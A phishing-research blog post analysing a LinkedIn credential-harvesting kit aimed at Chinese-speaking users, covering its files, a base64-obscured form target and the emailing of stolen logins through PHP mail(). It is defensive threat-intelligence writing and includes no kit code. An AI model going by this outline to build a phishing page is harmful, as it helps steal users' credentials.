LinkedIn phishing kit targeting Chinese users – an analysis

No comments

At StalkPhish we like dissecting Phishing kits, first because we create Yara rules for detection, secondly because we must continually keep up to date with new developments in terms of phishing kits, finally because we like to pass on to the general public knowledge about this type of threat.

This post was previously published on our LinkedIn page.

On 05/25/2022 our StalkPhish.io infrastructure detected and grab a LinkedIn phishing kit targeting Chinese people. We decided to call this kit LinkedIn_Fudsender in reference to some comments appearing into the page used to send stolen credentials to the actor’s email.

As you can see below, on the phishing kit landing page, all text is written in Chinese:

Sometimes actors keep phishing kit sources available on the website they use as landing page, and these kits can be downloaded, what is useful for an analysis:

Once the package retrieved, you can check what’s inside. This kit is particularly simple and efficient, 3 PHP pages, 2 pictures and some JQuery JS files, that’s all:

The index.php, the landing page, presents login fields, written in Chinese, and a background image referring to LinkedIn:

The page only retrieves the login and password and sends them to the PHP script next.php (here base64 ‘obfuscated’ as “bmV4dC5waHA=” -> “next.php”):

The next.php PHP script will get the credentials to send them, by email (using the PHP mail() function), to the email address implemented into the email.php script ($Receive_email):

As you can read, some parts of the code are commented out or even unused (the redirect_link is not usable), which may lead us to believe that this is a modified kit, probably supplied by The Fudsender marketplace.

Fudsender makes a business out of selling products dedicated to spam, scam and phishing. Anyway you should keep in mind that many phishing kits sources are often copied and reused by other actors who repackage them. This page shows a LinkedIn phishing kit sold on the Fudsender marketplace:

Of course we informed the LinkedIn Safety Center of the presence of this threat on their page dedicated to report such information.

I hope this short post has helped you to understand how this minimalist phishing kit works. If you like it, don’t hesitate to follow our LinkedIn news as well as our various blog posts and tools dedicated to the detection and fight against phishing. You can also find us on Twitter.